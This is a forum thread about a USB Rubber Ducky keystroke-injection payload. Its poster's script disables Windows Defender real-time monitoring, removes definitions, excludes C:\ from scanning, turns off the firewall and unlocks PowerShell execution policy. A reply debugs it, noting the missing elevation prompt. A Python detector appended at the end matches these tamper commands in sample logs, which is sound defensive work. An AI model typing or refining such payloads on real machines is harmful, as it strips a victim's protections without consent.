Rusty_83 Posted March 28

Hi,

I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing. I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green. I'm using Windows 11.

What am I doing wrong?

Thanks for any help

Irukandji Posted March 28

Have you tried? https://payloadstudio.hak5.org/

dark_pyrro Posted March 28

4 hours ago, Rusty_83 said:
> tried a number of scripts

What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.

Rusty_83 Posted March 28 (Author)

14 hours ago, dark_pyrro said:
> What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.

Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky. However I haven't been able to disable Windows Defender. The script I used is as follows:

-------------------------------------------
DELAY 3000
GUI x
DELAY 500
STRINGLN a
DELAY 1000
ATTACKMODE HID
DELAY 500
REM STAGE 2 Stop Windows Defender Anti Virus********
REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy
REM Unrestricted}"
DELAY 1000
STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";
DELAY 1000
STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\";
DELAY 500
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
DELAY 1000
STRINGLN netsh advfirewall set allprofiles state off
DELAY 1000
STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
DELAY 1000
SHIFT y
DELAY 500
ENTER;
-----------------------------------------------------

However Windows Defender is still running. Any ideas?

dark_pyrro Posted March 29

8 hours ago, Rusty_83 said:
> DELAY 3000

Not really important in terms of getting the payload in general to work, but instead of using the initial delay, you could use the PASSIVE_WINDOWS_DETECT extension since the target is Windows based.

8 hours ago, Rusty_83 said:
> GUI x
> DELAY 500
> STRINGLN a
> DELAY 1000

Something's missing in this code block. Usually, you need to confirm the elevated terminal/console, but I can't see that here (i.e. "Yes" has to be pressed to get to the elevated prompt). A longer delay is perhaps also needed, but it depends on the performance of the target and how fast it can open the PowerShell window.

9 hours ago, Rusty_83 said:
> ATTACKMODE HID
> DELAY 500

This shouldn't be necessary since the default ATTACKMODE for the Ducky is ATTACKMODE HID. And, if it wasn't, it still had to be moved to the top of the payload since keystrokes are entered before ATTACKMODE HID is introduced in the payload code.

9 hours ago, Rusty_83 said:
> STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";

Try running this line manually exactly the way it looks. What is the result? It will cd into the directory, but then just echo the rest of the commands. Remove the quote marks around the commands and try it again. Any difference?

A general tip is that if something isn't working, try running it manually and see what the results are. It will help a lot when troubleshooting.
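
The commands typed by the payload in this thread are Defender and firewall tampering that command-line logging can catch. The following is an added example, not part of the original thread or any poster's code: it matches those commands in constructed log records and alerts when several distinct tamper actions hit one host within a minute. The record format, host names, timestamps, window and threshold are assumptions.

```python
import re
from datetime import datetime, timedelta

# Tamper actions taken from the commands in the payload quoted in this thread.
RULES = {
    "realtime_monitoring_off": r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true",
    "definitions_removed": r"mpcmdrun(\.exe)?\b.*-removedefinitions",
    "exclusion_added": r"add-mppreference\b.*-exclusionpath",
    "firewall_off": r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off",
    "execution_policy_unrestricted": r"set-executionpolicy\b.*unrestricted",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def classify(command):
    """Return the names of every tamper rule the command line matches."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command))

def correlate(events, window=timedelta(seconds=60), threshold=3):
    """Flag hosts where >= threshold distinct tamper actions occur within window."""
    hits = {}
    for ts, host, command in events:
        for rule in classify(command):
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), rule))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            rules = {r for t, r in items[i:] if t - start <= window}
            if len(rules) >= threshold and len(rules) > len(alerts.get(host, ())):
                alerts[host] = sorted(rules)
    return alerts

# Constructed sample records (timestamp, host, command line), shaped like what
# process-creation or PowerShell script-block logging would hand to a pipeline.
SAMPLE = [
    ("2000-01-01T21:14:03", "WS-01", "Set-MpPreference -DisableRealtimeMonitoring $true;"),
    ("2000-01-01T21:14:04", "WS-01", "netsh advfirewall set allprofiles state off"),
    ("2000-01-01T21:14:05", "WS-01", "Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false"),
    ("2000-01-01T09:00:00", "WS-02", "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"),
    ("2000-01-01T09:30:00", "WS-03", "Get-MpPreference | Select-Object ExclusionPath"),
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE).items():
        print(host, rules)
```

Single matches from `classify` are still worth reviewing on their own; the correlation step only raises priority when the actions arrive in a burst, as they do when typed by an injected-keystroke script.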